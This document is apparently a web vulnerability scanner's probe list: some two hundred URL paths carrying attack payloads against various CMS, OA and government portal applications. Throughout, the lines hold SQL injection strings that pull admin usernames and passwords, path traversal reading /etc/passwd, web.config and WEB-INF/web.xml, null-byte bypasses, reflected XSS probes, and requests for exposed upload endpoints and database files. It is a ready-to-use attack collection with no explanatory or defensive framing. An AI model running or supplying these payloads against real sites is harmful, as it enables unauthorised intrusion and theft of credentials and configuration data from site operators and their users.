/rss.php?module=news&attasql=union%20select%201,reer,3,4%20from%20boka_members%20where%20uid=1%20order%20by%20id%20asc%20%20--%20a
//wap/board.php?filter=3%20union%20select%201,2,3,4,webscan,6,7,8,9,10,11,cfreer,13,14,15,16,17,18,19,20,21,22%20from%20boka_members%20where%20uid=1%20--%20a&classid=1a&digest=1
/admin/index.php?_m=../template/css/login.css%00&_a=admin_list
/case/?settings[met_img]=met_admin_table%20where%201=1%20--%201
/login.aspx?test=TestSystem&password=1122&oid=2%20and%202=(convert(int,char(106)))&uid=1
/info.php?fid=1&tblprefix=cms_msession%20and%201=reer%20--
/ajax.php?action=letter&letter=a
/index.php?q=1%25%2527%2520and%25201%253D2%2520%2523&do=search&action=lists&module=product
/index.php?action=detail&do=offer&title=%2527or%25201%253D2%2523
/index.php/Index/index/name/$%7B@print(md5(1122))%7D
/index.php?m=news&s=admin/newslist&submit=%E5%88%A0%E9%99%A4&did=999%29%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%28selEct%20concat%28user,0x7c,password%29%20from%20f10bd198561acb0197452013b7a82429%20limit%200,1%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
/index.php?m=payment&s=admin/pickupmod
/admin/receive.php?signMsg=0FEBF34C4A2EBF825F60025D6C0576F2&version=%3Cobject%20data=data:text/html;base64,PHNjcmlwdD5hbGVydCg0Mjg3Myk8L3NjcmlwdD4=%3E
/user/City_ajax.aspx?Cityid=-1'%20%20union%20%20SELECT%20'webscan',2%20FROM%20fs_sys_User%20WHERE%20id=7%20%20and%20'1'='1
/servlet/ShowPic?filePath=/tomcat/webapps/ROOT/WEB-INF/web.xml
/mep-admin/DcServlet
/mep-admin/userAction!queryUser.action?start=0&limit=10
/admin/picupload.aspx
/manager/picupload.aspx
/microshop/index.php?act=api&op=get_personal_commend&data_count=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,concat(0x7c,md5(1122),0x7c),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46%20from%20shopnc_admin
/TreeDialogController.zc?backId=buyer_id_0&backName=buyer_name_0&dialogType=radio&method=getBuyerDialog&tempBackId=temp_buyur_id_0&tempBackName=temp_buyer_name_0
/admin.php?c=ajax&f=exit&filename=opt&group_id=1%20union%20select%203,1,0,md5(1122),account,6%20from%20qinggan_adm%20where%20id%20like%201%23&identifier=1
/index.php?c=tj&f=include&js=/../../config.php
/index.php?c=ueditor&f=remote_image&upfile=http://0.0.0.0/reer.php
/api.php?c=opt&f=index&group_id=-1%20union%20select%201,2,0,md5(1122),5,6&identifier=reer
/radcontrols/editor/dialog.aspx?dialog=ImageManager&editorID=');%3C/script%3E%3CScRiPt/acu%20src=1%20onerror=alert(42873)%3E%3C/ScRiPt%3E%3Cscript%3E//&language=zh_CN&sessionID2=8ca6abaf-d361-328c-9178-%20f78311cd0329&UseEmbeddedScripts=yes&useSession=0
/system/nhome/login.jsp?message=%22)--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/cgi/index.cgi?error=badlogin&__mode=show_login%27%22%28%29%26%25%3CScRiPt%20%3Ealert%2842873%29%3C%2fScRiPt%3E
/styles/outlook1/tools/calendar/calEditEvent.php?action=edit%22%3E%3Cscript%3Ealert(42873)%3C/script%3Ebad=%22&calid=
/web/User_Sort_List.aspx?infoid=2%20and%20char(106)=0
/forgetbf.asp?errstr=--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/Ajax_Handle/UploadAttachmentHandler.ashx
/Web/Exam_List.aspx?typeid=18%20or%20(char(106)=0)
/Ajax_Handle/UploadPictureHandler.ashx
/Ajax_Handle/UploadLocalVideoHandler.ashx
/index.php?m=api&a=userpreview
/index.php?m=Appmanager&a=loadapp
/CMSUploadFile.aspx
/api/shop.aspx
/sysinfo.jsp
/login/Log.aspx?loginname=/**/'/**/and/**/char(106)%3E0/**/--
/login/publicpage.aspx?infotype=InfoZWGK_zwgk'/**/and/**/char(106)%3E0/**/--&dic_name=
/file/MyDownLoad.ashx?path=../web.config
/file/PackagDownload.ashx?sessionId=../../../../../webscan.txt
/broadcast/displaynewspic.aspx?id=1/**/and/**/1=char(106)/**/
/feedback/processvalue.aspx?num=e'/**/and/**/char(106)%3E0%20--
/channel/QueryHig.aspx?AcceptDept=&AppBusinessName='/**/and/**/char(106)%3E0/**/%20--%20
/login/proexamineview.aspx?ActivityInstanceId='/**/and/**/user/**/%3E0/**/--
/api.php?op=video_api&pc_hash=test%22/%3Ec%3Cscscriptript%3Ealert(42873)%3C/scscriptript%3E&&do_complete=1&uid=1&snid=1
/FileDownloadServlet?websiteId=1&templateName=/&fileNames=../../WEB-INF/config/db/dataSource.xml
/setup/setup1.jsp
/examlist/id-12,pid-104,key-%27and(char(106)=0)or%271%27=%27.aspx
/Article/?Type=18%20/**/and/**/1=char(106)--
/login/TransactList.aspx?ItemName='/**/and/**/1=char(106)/**/--
/file/EmailDownload.ashx?url=~/web.config&name=web.config
/file/UDFDownLoad.ashx?path=~/Global.asax&name=Global.asax
/file/DownLoad.ashx?path=~/Routes.config
/file/FileUpload.asmx/UploadFileBase64?url=~/Content/cesi.aspx&data=VGhpcyBpcyBhIHRlc3QgLSBieSBjZnJlZXIgd2Vic2Nhbg%3D%3D&status=0
/file/FileUpload.asmx/CopyFile?sourcePath=/web.config&targetPath=/Content/reer.txt&overwrite=true
/download.jsp?path=WEB-INF/&name=web.xml
/page/upload/down_file.jsp?fileName=ljer.gif'%20or%20'1'='2
/mx_form/order_save.php
/index.php?app=tag&ac=add&ts=do
/member.php?act=index
/Article/?KeyWord=1'%20and%201=char(97)%20--
/apas/portal/tableDownload/download.jsp?tmpfilename=../index.jsp
/admin/payonline.php?act=login&table=information_schema.SCHEMATA%20where%201=(select%201%20from%20%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/frame/help/read_help.php?HELP_ID=-1%20union%20select%201,2,3,concat(0x7c,md5(1122),0x7c),5,6
/Channel/SearchResult.aspx?ItemName=1'%20or%201%3Echar(106)%20--
/Broadcast/Broadcast.aspx?type='%20or%201=char(106)%20--
/Broadcast/BroadcastView.aspx?type=InfoTPXW&InfoId=1122'%20and/**/1=char(106)--
/Channel/ChannelList.aspx?a=a&LicenseType=2'%20and/**/1=char(106)--
/jvideo/down.jsp?pathfile=/WEB-INF/ini/merpserver.ini%00.flv
/jiep/down.jsp?pathfile=down.jsp%00.txt
/index.php?m=Goods&a=showcate&id=1'cfreer
/Goods-showcate-id-1.html'cfreer
/pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20md5(1122)%20from%20user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1
/jvideo/objectbox/selectx_userlist.jsp
/yhzc/NewFile.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/yhzc/isPass.jsp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/yhzc/isFlag.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Bulletin/Businessview.aspx?infoFlowId=0'%20and/**/1=char(106)%20--
/Bulletin/ColumnList.aspx?LanMuId=1'%20and/**/1=char(106)%20--
/Channel/TableDownLoadList.aspx?deptid=0011')%20and/**/1=char(106)--
/celerityAlleywayDetail.do?type=7'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Bulletin/DocmentDownload.aspx?ID=1122'%20and/**/1=char(106)--
/ViewSource/SrcStencilList.aspx?listType=1&SerailNO=11xxxxxxxx&buqiId=22&infoflowId=1122'%20and/**/1=char(106)--
/ViewSource/ProExamineView.aspx?ActivityInstanceId=0&ActivitySchemeGuid=00000000-0000-0000-0000-00000000000'--
/burgherServiceDetail.do?bs=1&serviceType=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/yushouli/yushouliResult.do?item_ID=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/indexGetDatags.do?depNO=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/bqbzDetail.do?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/counter/counter2.php?id=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,md5(1122))%20as%20char),0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/oa_server/App_Pages/App_page/UserSpuerAdd.aspx
/oa_server/App_Pages/App_page/user_list.aspx
/cms/cms/site/cms_site_template_upload.jsp?action=save
/cai_study.asp?FN=cai/test.flv&cls_no=&cai_no=lzgy&stu_no=1122'%20and%201=char(106);--
/deptProceedingDetailnew.do?itemtype=6&depNO=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122&approveName=&nowPage=3
/deptProceedingDetailnew.do?itemtype=12%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)&depNO=jx&approveName=&nowPage=3
/lm/front/reg.jsp?sysid=../reg.jsp%00.jpg
/web/SubmitLogin.do
/pic.aspx?classid=60)%20and%201=char(106)%20--
/frm/Count.aspx?id=29308%20AND%201=char(106)%20--&type=List
/engine/websigncontrol/readsigndata.jsp?id='%20union%20select%20concat(char(98,121),0x7c,char(99,102,114,101,101,114))%23
/index.php?c=MTA3==&op=../../../../../../../../../../etc/passwd%00.jpg
/SRP2003/UserManage/sysuser/modifypage.asp?id=1
/venus/AsVenusCA/desk/message/reply.asp
/Article/ArticleDetaileNews.aspx?type=2/**/and/**/1=char(106)--
/mx_form/order_save.php?form_id=5
/download.aspx?id=337&accessory=UploadFile/softdown/../../web.config
/cms/web/testsql.jsp
/web/zwdt/jjj.BjcxServlet
/login.php?LOGIN_USER_INCLUDE=/etc/passwd
/cms/client/uploadpic_html.jsp?toname=test.jsp&diskno=webscan
/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=11&AddWebColumnID=22&filepath=/app/
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,md5(1122),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%23
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23
/webUser/webUser!list.action
/logincheck.php?UNAME=cfreer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/admin/annual/delete_leave.post.php
/admin/workingsituation/check.php?uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29&project=459&type=task&name=bbb
/admin/workingsituation/download_excel.php?day=30&start=&end=&project=0&uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29%23&task=0
/admin/workingsituation/ajax.php?task_id=10039s&type=update_status&status=1s%27%20and%201%3D%28updatexml%281%2Cconcat%280x23%2C%28select%20md5%281122%29%29%2C0x23%29%2C1%29%29%23
/down.asp?cat_%69d=3%20and%201=2%20union%20select%201,'ijx',3,4,5,6,7,8,9,10,11,12,13%20from%20admin
/jdwm/cgi/getpwd.cgi
/public/jspdownload.jsp?FileFullPath=%5Cetc%5Cpasswd&FileName=passwd
/public/jspdownload.jsp?FileFullPath=c:%5Cwindows%5Cwin.ini&FileName=win.ini
/cms/web/jspdownload.jsp?FileUrl=c:%5Cwindows%5Cwin.ini
/cms/web/jspdownload.jsp?FileUrl=%5Cetc%5Cpasswd
/cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/reer.txt
/CorpInfo/CorpBaseInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpAptitudeInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/PersonnelList.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpAchievementList_SG.aspx?CorpCode=1122'%20and%201=char(106)%20--
/Credit/ShowCorpCredit.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpDeBox.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpRewardsList.aspx?RewardsPunishment=1122&CorpCode=1122'%20and%201=char(106)%20--
/BM/Project/HistoryBindSegmentLeftList.aspx?CorpType=1122&CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpSendLeftTree.aspx?JoinID=1122&CorpCode=1122'%20and%201=char(106)%20--
/forUI/Policy/showPolicy.aspx?ID=1122'%20and%201=char(106)%20--
/forUI/Person/EmplInfo.aspx?IDCard=1122'%20AND%201=CHAR(106)%20--%20
/forUI/Policy/DO.file?ID='%20or%201=char(106)%20--
/search/index/portalId/427?keyword=1'%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(114)%7C%7Cchr(101)%7C%7Cchr(106)%7C%7Cchr(101)%7C%7Cchr(114)%20FROM%20dual)))%7C%7C'
/Ajax_Handle/UploadAttachmentHandler.ashx
/ExtendForm/Down/Technological.aspx?id=1'%20and%201=char(106)%20--
/public/editext/up/soundsave.asp
/public/AspUpload/upload.asp?path=../../upload&processid=1
/xyEmployee_checkLoginForUser.do?userName=reer
/opac/ajax_get_file.php?filename=../admin/opacadminpwd.php
/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php
/kc_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL#
/kecheng.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL#%20
/kecheng_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/include/ad.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/index.php?language_id=1%20and%20%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28select%28md5%281122%29%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23&is_protect=1&action=cccc
/picnews.asp?%69d=-1%20and%201=2%20union%20select%201,2,3,chr(106),5,6,7,8,9,10,11,12%20from%20admin
/opensoft.asp?%69d=10%20and%201=2
/phpsso_server/?m=phpsso&c=index&a=getapplist&appid=1&data=
/bmsltxDetail.do
/setAcceptance.do
/setAcceptance.do
/setMaterials.do?ITEM_ID=12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/intoSpDept.do?bmid=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/nobom.php
/infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1'%20AND%209935=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)%7C%7CCHR(112)%7C%7CCHR(102)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(9935=9935)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(117)%7C%7CCHR(115)%7C%7CCHR(115)%7C%7CCHR(113))%20AND%20'keyi'='keyi&filters=
/lm/front/mailhotlist.jsp?editpagename=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&sysid=001
/lm/front/findpsw.jsp?editpagename=&groupid=&sysid=../../../../../../../../../../etc/passwd%00.jpg
/admin/Admin_Config.asp
/Project_SPInfoList.aspx?CategoryCode=1'%20and%201=char(106)%20--
/zxts_view.aspx?Id=4%20and%201=char(106)%20--&GBType=1
/FileUpload
/oa_server/App_Pages/App_page/user_update.aspx?userid=172
/api.php?c=api&f=phpok&id=_sublist&param[pid]=1%20union%20select%20concat(md5(1122),0x7c,pass),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20from%20qinggan_user%23&param[phpok]=1
/conformID.asp?Tid=jx'%20and%201=char(106)%20--
/DelAccessID.asp?AccessID=1'%20and%201=char(106)%20--&Datetime=
/KS_Data/KesionCMS6.mdb
/KS_Data/KesionCMS7.mdb
/KS_Data/KesionCMS8.mdb
/KS_Data/KesionCMS9.mdb
/conformID.asp?Tname=web'%20/**/and/**/1=char(106)--
/Asearch.asp
/linklist.asp?TlinkID=26'/**/and/**/1=char(106)--
/zyjs.asp?Txy=18&tzy=11'%20/**/and/**/1=char(106)%20--
/Biogenic.asp?Tbynf=21'%20and%201=char(106)%20--
/specialty.asp?Tbynf=1%20and%201%3Echar(106)%20--
/api.php?op=video_api&pc_hash=1&uid=1&snid=1122%22%20onmouseover=alert(42873)//&do_complete=1
/toall/desktop/dbform.asp?fn=&fntxt=&varid=8%20AND%201122%3DCONVERT%28INT%2C%28CHAR%2899%29%2bCHAR%28102%29%2bCHAR%28114%29%2bCHAR%28101%29%2bCHAR%28101%29%2bCHAR%28114%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28106%29%2bCHAR%28120%29%29%29
/index.php?c=ajax&a=member_login&template=../../ooxx.php
/addcontent/webEditor/upload/files/file_down.jsp?filename=/../../../../WEB-INF/web.xml
/addcontent/webEditor/upload/files/file_down.jsp?filename=/.xx/./.xx/./.xx/./.xx/./WEB-INxx/F/web.xml
/Tools/FileTool/Manage/Notepad.aspx?objfile=C:/windows/win.ini
/Tools/FileTool/Manage/Notepad.aspx?objfile=/etc/passwd
/workflow/flow_details.aspx?action=details&job_id=-12%20and%201=char(106)
/search.aspx
/servlet/fileOpenforms?filename=/index.jsp
/application/gzhd/bgxz/download.jsp?filename=/index.jsp
/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1122'%20and%201=char(106)%20--
/truexxgk/app/nrglController/loadZwgk?zdjc=reer'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd&type=1
/NewsList.asp
/ActivityList.asp
/WidgetsHandler.ashx?widget=reer'%20where%201=1%20AND%20char(106)%3E0--
/common/guestbook.php
/common/help.php
/Comment/Comment.aspx?id=11'%20and%201=char(106)%20--
/wap/index.php?a=newslist
/index.php?_COOKIE[cfg][database]=mysql&_COOKIE[cfg][db_host]=localhost&_COOKIE[cfg][db_user]=webscan&_COOKIE[cfg][db_pass]=reer&_COOKIE[cfg][db_name]=db
/?question/tag/0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/?question/search/tag:0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/admin/uploadFile.action
/Adminiscentertrator/AdmIndex.asp
/Adminiscentertrator/AdmLinkInsert.asp
/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/NewsList.asp
/bit-xxzs/xmlpzs/bsdetail.asp?id=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/ysxkdetail.asp?permitsaleno=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/index.php?case=archive&act=orders&aid[aid%60%3D2%20and%200%20union%20select%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,md5(1122),36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_user%20where%20userid%3C2%20%20--%20%20a]=26
/zhanshi/equzhanshi.aspx?equid=-301'%20and%201=char(106)%20--
/prozhanshi/zice.aspx?id=-101'%20and%201=char(106)%20AND%20'at'='at
/prozhanshi/yuxi.aspx?id=-306'%20and%201=char(106)%20and%20'at'='at
/truexxgk/app/xxgkznController/firstXxgkznByZdjc/'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/zhanshikebiao.aspx?centid=-301'%20and%201=char(106)%20--&date=&xyid=
